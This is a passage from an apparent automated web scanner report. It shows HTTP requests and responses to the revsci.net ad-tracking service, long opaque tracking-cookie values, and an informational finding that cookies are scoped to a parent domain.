rtc_gNkk=MLvn9jM1Jgpr54aeFy58YLrc3TPJXKuUhF+WKpWQ6BT9vtIMiLEgfriSIH+6oN7+gF9hY+HDTba4RTjzA519wkRHZcOAJEo4DQzt2Om/hARoMTcLYKE4b9Mk3IyFloX4lVi/0zObRRfG/BqiXqBUCsu9DR7K8008eZg4eQFvS5MzWThlk8WWNcoC9XDBsIaSi9nd4TH7BLUfaDl5nZIqlDBCeZfsq5IrZg73tkP4E2yiMsBY+NuBZX/1qeiF34a22ee6sDUKIxVpAmcv4nhe0LXvJDdS4iC9TldQnJlW761Iu9PGbayZw9MbzArkTKcIpHM8E+Os9AEPY7O6oRLRFFyxBRbtX2QSKiWNR4VoM+1FCrFdKyVCKiEd38QdLXcycGkOqfOJf5mxNMKGG/62UDrXysoExPPPkaHRyNEHI4ONCijKQeNg4Tprvy8xiEFwV7pUk55r0Uf1rdz5sbPL7rDAOQlrKYryCdPj5wFP0f++d1twsfNbWi2huPm8m9HwoNU954aVSLkceBGu9dZOOeetxqPewEdPxHyIsSaGmEvexjPrrTASD7QsT02gWWSHW6XI18VbNNmdwjIzFNi9N/mKv/c2e8XGnbl1ez0CVJlIRwDHnpB5xxpxtuaL0vbsvZRbeDRddVgKA0cJZNJD8DDM7rUBqzYYszdunVBZVxY0glO22UJOzGb/NDQu0BGtbZfxBLGNlTiP9AO2CFcUcKHFmIJAx1JvsBzyrM313xt+ttLSnlFFRcq7AIRyDyp+Fi3Ya4huqfx/m2rVBVeIPWWLZl9/uf1fJxiZUh24CF0po6s/LTg86FUZaYZX0mjFKIpDqS5VJRc3jo7RApI74eEZL1xDHCxCze1ohFq8jgKcdbQI0CevEfWbM5FfaReCoyHlCaobvF0GYEKHQr2V9hnv35BhxzEI25L5lfm77cKyt8xfrmiQHYpQRzApKVFb3YTmHMKZFZJ64J6V6dDZp+G3p21fv6Dtj/0ZO9hXpY2vSIg/P30WadGL5q4VYNVErOo9p1L3F5Ybowv7Kmvxa0p/j7UyrpFwLWGddArBKxiAY/TVYJh/JMQugWKt3nlJuinIfJ8GKIUGE0jyIIf3iFRaCfSGcDPYJdB8BT/JXEMxKRqqS6DypKcvjzS/tBZUwiCAJFx/9EyC7Y87mcVjmsr+3GbkMQQmeaMgxD0jmFUuKkH02ny91Jb5+VtUPGmjNrdl2KGe9TtIAY3t0ofHQrz6otIYD8qi8HUiWJmdRBsAS6wZPWrTrxM8m8vRALbZxPLLa/Lw/YlHTsMwQ3CyMzERhkgwh7Nwh+Ff3K6N0wPsQRrFWrKJr/04MNRKN8eEmpJxELGcZgeCELAurmuXmhOrwANWiFr6Y5D+Nzh7XaZ5QAjjEHnPx/yzNVRCoPQCBeMc063urg5UAbQDdyBdbr8brehaHtwit48XrkXPxYVmgHeTZBZElWHgm84RIXxtS3oPYdhov2zAM5MjoZfz0kW/1QnUeIEHrIYojONHEGCFUYZbk9fgVO477YrqJm74Ild5/OnZXA5njF+ln1ytVEFTrBYq0oDHk8Ba5wiiEL065y18CXWfM8ucXNv9fbeZ2ooHI8QbxxoTx/uHwt2wpal+Xn30BUwfUt1JmeHJrpCyyzX4qN30Yd9DcYhQ6W47GnbjBcuu+pe+jx1T6sX7nRsFsziOctAgDKvHI0SVIrepM0q5rVA1gwIFolJeC0LGuOJPX6oSxwxzfvFYmR6e0G+eB+TIU0fkTsktG1e7YEC3Z5S3wAzn3TEOymS/ajl80qxtQbfDmRUKB5ZgYZDEQchUlMTjKwzUlZbzvODGAoDkHcyd5gATArIYcBJOivK2FGlFtWBaJQKi/5GQkLoXm9K9n5dvcxVPSw==; udm_0=MLv39CEJZjpv597JwPKJxC5gZVtCsylMowZVqFba93uE88QpuDb5ZC9UQMpBwKgJsgsK/5y/VyTHjCWG4SoGRm5dWoFU7PHkVBVRsmPo8ulpSziaGfT5EodlaMm+vF2r3l/c95LrsITXHJ2I1zqJbIwuKe5PN2KgWbN8mNcvi/u7eq2U+HGkHowc+nxezhSslqi3VLe86ut3/CbD7ii3elUpunmujKWIZxPJ9ltUcyTIwhrqdTnfK90aiYPaKzaUqqi1CDohU8VolCkQ/PbXsT0D64lEj1zTEx0fYZK083py+2GEeADpri0HRNaxF300KQuDjQ6yz58+/gEwpcHSlXrUjeL+Q+A2KWMxSaXE3vLUGnK762eDMdGneRi4Z5R/PDaDROL3MikWyJfZq3hJmDPIcsKjZ7WKze1UFa9+VR6Daqv9+IX/j69KWQiiGHN62ZLnTvJDkw/+LGzEdm+xrncZe/MTLl/tzGbC6OZ0xyhOwOxLvpW4OEBvo1vFPZqQ8/4dUIZ9c/tMlDDqcpEk6cZrfGczZNcJ07uJ6oe4iZsjKWewFYiQsK/rbrMrdrfQ/1Su1smIgKxV/Y7oSQzXAjnycWIGfDTAndbGihpi8nFzveXcTFNP5ap414bqma34KoXwzYOq2sc7L4a4qOCmcRiLxjHOc0PPPoNmxhfMWndLuIWTqiOZ4fC0D3IIa7verqW/TDSuCVZ4/orK2q93e17LqkrpOdscw4BbMow6IH7X1OwrXgdjH2/vC9ieEfItiNwQm/uKzk/rnEcVobls6XLls68BM8P9BLC9CTJ6FW1a2w9AOYL2XuoVlnxrjqQPEq4TJtb4mppTU9JrmC9dDEMVwLVNX2aP+Qizf0csOzMy1yU7/fW8h2V1Fh2MeGTjho24iDQqgz4BHQnU7cajGik/56FuARVHL/klg+jUrgSyRsWErWs4tagMBICsdSAiN4tHzJKNsWD1RNYyM2mz7OtgN34QjNO13raQh9KK+UWgc5rtxG0dJuMCoIB4X/hheL8GjEwr+reg/R3m7iuStF0nM5KEJf8qN3Jd3KNrW29NASW0ZNG8TRP3WpdNC1EXEgHYHAjK5b8qNIxRpUqD7btnu/7mzW1a5L/HqPfjtu2qmBWPXPU0k8BdOhAlQGKzABVcTeH7d4Na8CZMdKgNzi52xXhAHqzGYP6Jv3XrXlkJmmp8JzGb+Gmv13RIc2KjMZHqcXB+aXLsPdbwjNmb9lJ2+oUGpQZgH12jfK8uKuHOnVxIzQbugywkDX47CIxRV5y+bCwKY89nBay4+AXw/XyremaQ19e7j9A65Xeqz8nK6eezLWs2STWqnAYxnLskLHMzo52qf22tCqcGXq7CGYNR5tfPHBaQhbi8L0bj1ToQM3w0EEhFavgGW8SLtdUODbZFMwPPZ9LSkHDkpM0wf0Hxef3U9E+m2XvWGHg3cU92f5el+wGICUvGb+KsKCaxvvG7KIz2Thse+5WRvmy6IkCYwqk9KHBsTqashxrqRTPDf+cLSf8Y3dw=; rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1NhVrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; rsi_us_1000000="pUMVIzlHMAYY1A3HkAz1jyt3tlSj9WvRyFxc7CYdMac7y9zNu2VAbbuAi9eNwCUC8Wl4wOOguOEurHKK5ymr+WMVxLrjQRwI/BIpxOPADBg2yufgfgLgTu5j4fLTEQPVeuiSCftktrpjidSb3tKRT16/qhDddfs4YO14yGwo3mknI3Zsage7Hp/us89s/r8sHOwuTFP/CGJvF0CBpAcFUrFpcSeddZugAt2/rJIEsl5lFIWoWu0NxYgUpdu1epUcSWwK6nXWutDM3kjbS6MwxlDUEHsfiC/tX/ajBDdyf6FoclGT9hYvZ6yHELxTGV52+gM/KNJ7HFfCnqBSHyO9h6K2IG72DZG1gnriBn20N4unmsPk3dyDXHODxND8UIYEdTEJhqUeX0XH8ufbk9oKEcwKphMNOSzMjsdEazx5OG/X/voubSxcMfLggv+AZDDDoXbGHiM/jsG6UCatRfU6qwA/nFJ2HLM4H6Vwy6n5QW6iEtTBjhACVrgjSJ1n0sxNueMqqowm9U9MjFONHQUR6SKVk9owlMGLCJ812+Zr34276nVTgfXxsLZ0YiftaKJuIZ0xP8YY9WkMkt9n8RFkDTls6k1BC7v58lSYgZALXT+bKUXFsuSpAsJNWsLmyWs+XDUQmVb0hR/fcPrwgVJhI4ZuwOsX3RWEdg83luatgZ5+TKYM1It/I+VexFONR38x4qDP9iS3Y7dK1r0pZRdkAEwT968QaKX4dePJx+FsOolAvtn/m15h6VbBjCGtzXDFJsq0asZ+2cixyyycOZ0q9ZO0pv1gaqV+NlgOEwszeFk1G7zGPKs7Hn4CRU8RwJ3PC192d/zQh845eP57+B+obaWwyCioHG3FOYiiZ8MJGnrYDWOTh6FFkJ/lnooujf2FtYlU9jKpfaACfJAKJrmg0lUhzCxs3khsT9cbaSuhk/AIXUky6y/7/4/TdCE/G9rDhkcJMYJhTogOtss3qAESQMf2AR/2GXUB9mpl5kBSpRkjsPnWAmqvOIHRkFGc7ucL8rPj3ymJwl+PX2ItsAHmMq2EnmNyakB+vuFAuT9h5l25oI1IwUVAVoafxDxIVvNI3J0B6g0A1HzsmnY5z077NnItIJh3xRNWe/iXIU+CrYWmkPOTjLSuO4lfoF4riXFUJbckXujjUDMTlq5PEpGKQnlA56Zfg9qW912fdgXl6AA2hOYwMsuwUbGDBMFhQ6XfL09iRogg1WfYzxZ2Np6PvGSDERHaUwP8t0euXTq2Q3eSJ4ppXnS6iCAnGFPbCsrGjyRLOmYtFL2Im/UUecMgAjO9mIZcYqqjLobxUzRXN7iqDqCwIOmEyWQ0dYPcKR9laCXq+0nRJKCUAJQnStj+/JYwWMQHmQKF2Ca/hmc4+baAz6xM2NKxfNlISgW/KhdUaqQ38MUa0a1KSbc9v0K8egn0NfsoKiOYm7vbWfw20dVvNkxG4pyhchNYi+IfuzopLXmexn1k8T0TEIckb31ULLX5aO+Lk6yh9ODYCQQrLrxanBsN1+8zTf3vg5v7l3gwefT81PMYeXwyan8ecHtrQGmGtzs3pQzd"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_gNkk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP1409BuHIMpjax3xDh/u5UG2vMqKTmRn5okelSXvknuZNZnDfOdzd0q7tfEV6W8KZgxAU1zJYbo4ySeJozi5LFmkkf+4Y6bYkWV1SZizgBMzp3EcFgE6G017VVW6p40CmQyH3jOB6M3uOveMeh2iY1ZBv1vMKSAJATDcXxMRze99i26Jb5EA9ZvBUBQCOLNlZdc1PBr590JxMxK3kemOgUYxWkvCQzvRoZGOhKIU2nYFQXpcFUnxOd7CqAwPNPRcsaqmqd5bH88hbVLgU4/pNIA5yuEJcIPeeGg9+bx5k/IfrFHRjft0ZIZ6+a8LvbP1F9f20smeVrZaOl7PWZnEwLjR8bSow8IznBeM4kH0Wps6j79bZjGkjO9FAdDgoOcv54zgmd74nlmcHZjx6RErrrC/34fPQ0fszJywMxzzQnWrshsE4MUOKoplfl+lTQ4MhWXJ+Yrt0vZS3/S4XoeqXFwxoj4lV6OnNa8UY1pEUlhONk+RELYIM93uJhP1fFj9rXET0X3Q38/0NNfnQ9iEUbhNC336gzi4gveVg2HsUq6Fymuu/jUVOVz5D6uR3kKA0uMOJte/TrlIJB9uKJTB3Hkj+OteqSnSo=; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:55 GMT; Path=/
Set-Cookie: NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf417&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 15:36:55 GMT; Path=/
Set-Cookie: rtc_-pbG=MLvn9jM1Jhpr5oaeFy5cQLrcDcgxJTbyaQGzwLZBotunayc2Fw/K4guEx48AnknPEndoby22cGHsdFck1iBn3DUobt55rCByo31GJyETeLJl0qvf6Jn2sxG2z0iT2bbcjJrHe8GBksW4qcll5AeaXjmGUDbRWU08YZg4edF2cBe9DspCxhQ7361ZfEotlSYP+MqBfL/w57DfCdIuJhyfxWDC+F4W0x32WtybJIRC8CLSlbxi3CC7anzdModTvAzrQfv7i4yJ4tfv23hElzRAo45NzalLx0pI92HjAlvLltXQMEeD59j8HSg5zMzrXkbxPGkDuQO8CD5Uy0X440+GhUuEBlTuXncKpo59or+teixmWGkw4h82xTsJxVA32RlmPlxfLd0DPboL+ScpDqJ7EyCMxiPZjPOZSZb/P18d0B6dPfXACkwW2b7JGqZgtJefS8MvIIRVOAWyGKSddY53IBjTDonVRQtAhow+gjBCkr32CoZhiC2o7W53iumA5JAaEKemP4CuriZ3Oh92wceTFssmiHV03P3TnzqwiMvWyGZOLcS0b36BgNTGDP/oHEgI419GHyNYPYePnsZhRU1jkIemN9OP89YbLzetkOaBNGBt72K+i32KTgFnJgkzRmDcwHADuX26Np6HbpwBpsafN0Td8Ege83IpcLfdCWoH/FOES7/sgvItqGMQtpNCesMiY1/hRPOhuADgEqQtp5XbMpu7Sw9desmqxa5M111GnRnmop62u913vIbogl+ZCoarCoWnW2EKAnaKevDI9CtQiAnPFAcM5XjabtRUvhL/d4fIh8imLNMmzGIfpvWHViSKdYGbIHfNIJWraMC4Vahh9asGqff/FFdlJKXDuHnrmiBy7VCK4q0bmyQiOi23Mbp4rMJ7ZFfExGjh0Deg21XrgVEJygAodlMrUFsYh3x+JL6tM82EyxlrjwnPSOPUficZAt2qOvCpWC4d70ONc6DbRXPel2qVWr9R4NR8spx21DQ329eEMe+a453iMV59kioeuCH7mnuTVCY0BzVfb8yQMpXNmGdq8018efv6cy0UrgNLG4Vvjwd577Jg6h+lwSUDxcDbZmAkDmKadjdnDBljgFfsyAsOrNyuDxbJ8TdkZR9gCAtjvsiBzxEVmOrYT6HzTeMLPHrrCPn/1PB0XdhHCeOuIM86Wd1eiYbwPVZOGYoxestkxrwvlBWmqS4zqiJgxGtklz6N9a8yWObB9QeQjynHLDznE3of6mhDRuDmkgGSe0nOe1faUBKdQj7BlaoONO99Gh3ocsQdQ6RyGiPqI42toAtkHfnwxlmtICBtRaKNsHXLNHetdA+4dp7vxXQ5tu/2hEFKF66SpSaQzQl8TB5m7kte9CE3/B32F347rQ4DCFhYj24E4ZyjUYbpe0M+kBzn/QykOyL/w0irDgy6ZQt/u+a1DUBqXRV0/AJO6NnbAxb2eDhLttfyzv258JjuenKMZ5xPt3XAFLN1oSvz6mF7fh50GXHUdoEQgkSBcZ1PS+wIfJy105Aol0wmkUqPh+kfoC4g82jad8JgHmsdZYx5FOIFhoBZb+snjaACRtXREaWla+3A8eufLP7nR7KLQvyYASC7SpnFhReJFBeehSPWU+4l2YWu2IunhD73tvQqrqM7UaWZW5R9IxXZ6BE+hyLrdBoYsxr5qgsF3QHqO2E6n0mUTNwl0lx9cFq7moVZ2JSzSIqGz8wv2TOVDrWCtgahQ4AuqpA7rev3wwCJJWC95V2UKuatoLe7dfcQ+Denb480wEG/t0RgjmDcYpnL90BoFiSV64XacUbSb6smN2yRmAHTsLTLO0QQnvg5vKkgJRJTsJ9hI4mqRmETR1BUZBdR48YLqpyeBqmK4NH5NH2LRq0bdNdk2U0gw4eAFmkAPgZUmniQzEOz; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:55 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:54 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

10.40. http://pix04.revsci.net/J06575/b3/0/3/1003161/498787488.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/498787488.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/498787488.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwPKJxC5gZVtCsylMowZVqFba93uE88QpuDb5ZC9UQMpBwKgJsgsK/5y/VyTHjCWG4SoGRm5dWoFU7PHkVBVRsmPo8ulpSziaGfT5EodlaMm+vF2r3l/c95LrsITXHJ2I1zqJbIwuKe5PN2KgWbN8mNcvi/u7eq2U+HGkHowc+nxezhSslqi3VLe86ut3/CbD7ii3elUpunmujKWIZxPJ9ltUcyTIwhrqdTnfK90aiYPaKzaUqqi1CDohU8VolCkQ/PbXsT0D64lEj1zTEx0fYZK083py+2GEeADpri0HRNaxF300KQuDjQ6yz58+/gEwpcHSlXrUjeL+Q+A2KWMxSaXE3vLUGnK762eDMdGneRi4Z5R/PDaDROL3MikWyJfZq3hJmDPIcsKjZ7WKze1UFa9+VR6Daqv9+IX/j69KWQiiGHN62ZLnTvJDkw/+LGzEdm+xrncZe/MTLl/tzGbC6OZ0xyhOwOxLvpW4OEBvo1vFPZqQ8/4dUIZ9c/tMlDDqcpEk6cZrfGczZNcJ07uJ6oe4iZsjKWewFYiQsK/rbrMrdrfQ/1Su1smIgKxV/Y7oSQzXAjnycWIGfDTAndbGihpi8nFzveXcTFNP5ap414bqma34KoXwzYOq2sc7L4a4qOCmcRiLxjHOc0PPPoNmxhfMWndLuIWTqiOZ4fC0D3IIa7verqW/TDSuCVZ4/orK2q93e17LqkrpOdscw4BbMow6IH7X1OwrXgdjH2/vC9ieEfItiNwQm/uKzk/rnEcVobls6XLls68BM8P9BLC9CTJ6FW1a2w9AOYL2XuoVlnxrjqQPEq4TJtb4mppTU9JrmC9dDEMVwLVNX2aP+Qizf0csOzMy1yU7/fW8h2V1Fh2MeGTjho24iDQqgz4BHQnU7cajGik/56FuARVHL/klg+jUrgSyRsWErWs4tagMBICsdSAiN4tHzJKNsWD1RNYyM2mz7OtgN34QjNO13raQh9KK+UWgc5rtxG0dJuMCoIB4X/hheL8GjEwr+reg/R3m7iuStF0nM5KEJf8qN3Jd3KNrW29NASW0ZNG8TRP3WpdNC1EXEgHYHAjK5b8qNIxRpUqD7btnu/7mzW1a5L/HqPfjtu2qmBWPXPU0k8BdOhAlQGKzABVcTeH7d4Na8CZMdKgNzi52xXhAHqzGYP6Jv3XrXlkJmmp8JzGb+Gmv13RIc2KjMZHqcXB+aXLsPdbwjNmb9lJ2+oUGpQZgH12jfK8uKuHOnVxIzQbugywkDX47CIxRV5y+bCwKY89nBay4+AXw/XyremaQ19e7j9A65Xeqz8nK6eezLWs2STWqnAYxnLskLHMzo52qf22tCqcGXq7CGYNR5tfPHBaQhbi8L0bj1ToQM3w0EEhFavgGW8SLtdUODbZFMwPPZ9LSkHDkpM0wf0Hxef3U9E+m2XvWGHg3cU92f5el+wGICUvGb+KsKCaxvvG7KIz2Thse+5WRvmy6IkCYwqk9KHBsTqashxrqRTPDf+cLSf8Y3dw=; rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1NhVrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; rsi_us_1000000="pUMVIzlHMAYY1A3HkAz1jyt3tlSj9WvRyFxc7CYdMac7y9zNu2VAbbuAi9eNwCUC8Wl4wOOguOEurHKK5ymr+WMVxLrjQRwI/BIpxOPADBg2yufgfgLgTu5j4fLTEQPVeuiSCftktrpjidSb3tKRT16/qhDddfs4YO14yGwo3mknI3Zsage7Hp/us89s/r8sHOwuTFP/CGJvF0CBpAcFUrFpcSeddZugAt2/rJIEsl5lFIWoWu0NxYgUpdu1epUcSWwK6nXWutDM3kjbS6MwxlDUEHsfiC/tX/ajBDdyf6FoclGT9hYvZ6yHELxTGV52+gM/KNJ7HFfCnqBSHyO9h6K2IG72DZG1gnriBn20N4unmsPk3dyDXHODxND8UIYEdTEJhqUeX0XH8ufbk9oKEcwKphMNOSzMjsdEazx5OG/X/voubSxcMfLggv+AZDDDoXbGHiM/jsG6UCatRfU6qwA/nFJ2HLM4H6Vwy6n5QW6iEtTBjhACVrgjSJ1n0sxNueMqqowm9U9MjFONHQUR6SKVk9owlMGLCJ812+Zr34276nVTgfXxsLZ0YiftaKJuIZ0xP8YY9WkMkt9n8RFkDTls6k1BC7v58lSYgZALXT+bKUXFsuSpAsJNWsLmyWs+XDUQmVb0hR/fcPrwgVJhI4ZuwOsX3RWEdg83luatgZ5+TKYM1It/I+VexFONR38x4qDP9iS3Y7dK1r0pZRdkAEwT968QaKX4dePJx+FsOolAvtn/m15h6VbBjCGtzXDFJsq0asZ+2cixyyycOZ0q9ZO0pv1gaqV+NlgOEwszeFk1G7zGPKs7Hn4CRU8RwJ3PC192d/zQh845eP57+B+obaWwyCioHG3FOYiiZ8MJGnrYDWOTh6FFkJ/lnooujf2FtYlU9jKpfaACfJAKJrmg0lUhzCxs3khsT9cbaSuhk/AIXUky6y/7/4/TdCE/G9rDhkcJMYJhTogOtss3qAESQMf2AR/2GXUB9mpl5kBSpRkjsPnWAmqvOIHRkFGc7ucL8rPj3ymJwl+PX2ItsAHmMq2EnmNyakB+vuFAuT9h5l25oI1IwUVAVoafxDxIVvNI3J0B6g0A1HzsmnY5z077NnItIJh3xRNWe/iXIU+CrYWmkPOTjLSuO4lfoF4riXFUJbckXujjUDMTlq5PEpGKQnlA56Zfg9qW912fdgXl6AA2hOYwMsuwUbGDBMFhQ6XfL09iRogg1WfYzxZ2Np6PvGSDERHaUwP8t0euXTq2Q3eSJ4ppXnS6iCAnGFPbCsrGjyRLOmYtFL2Im/UUecMgAjO9mIZcYqqjLobxUzRXN7iqDqCwIOmEyWQ0dYPcKR9laCXq+0nRJKCUAJQnStj+/JYwWMQHmQKF2Ca/hmc4+baAz6xM2NKxfNlISgW/KhdUaqQ38MUa0a1KSbc9v0K8egn0NfsoKiOYm7vbWfw20dVvNkxG4pyhchNYi+IfuzopLXmexn1k8T0TEIckb31ULLX5aO+Lk6yh9ODYCQQrLrxanBsN1+8zTf3vg5v7l3gwefT81PMYeXwyan8ecHtrQGmGtzs3pQzd"; rsi_segs_1000000=pUP148mheXIQT7uItGF25jD9QihE8IYbNKetsiW8kgFisncWnhVMqxlWq0ucAHjnyThQpuvVI9kMh8n1FZRZG3xOHqJgzQCOjhUe97Ueo/oV8rFkwdsAM2inFD5dxpd+U+E093xPsrix3+OZNio25HCvnvFhZhWthmBTyPD4RapFCIEu2lOw/IIwYkz+6mxP7SBJDiF24gicYCle3d6HY7QZbkm+odQJLW8+PWrecDnI1ZKZHQzsDKye1ebNlG+F0O7KsVRUWc2lZiRsgG+YnEnhhOgUjCqIi4i4q43MBu7CNjxFeYUhxsnubRYFgIe24n3W85w7P/Po0VHFfykAgOVvK83VaDdZKWD/KIVe8dqKzyeln73lCPFzE9HjxKDwsj/BfiMyOXhh1G8dLTLCbJhGOrlytpc84LHyZP+KVwJJNYdAUHQMimUPLIaj2XtIzdmkiZElC6E3vZ7BWA6vfqDqyz/UN2NTNZCl2XEU5yfs8jUdCq/L6cLps1Tz6jEWB3nM03mUZ7lIOmLJZpYScvQJPNi6Qhp+d6GkBErOgH5qxczpWuDAoetyw48xMGgXARtZi/Z7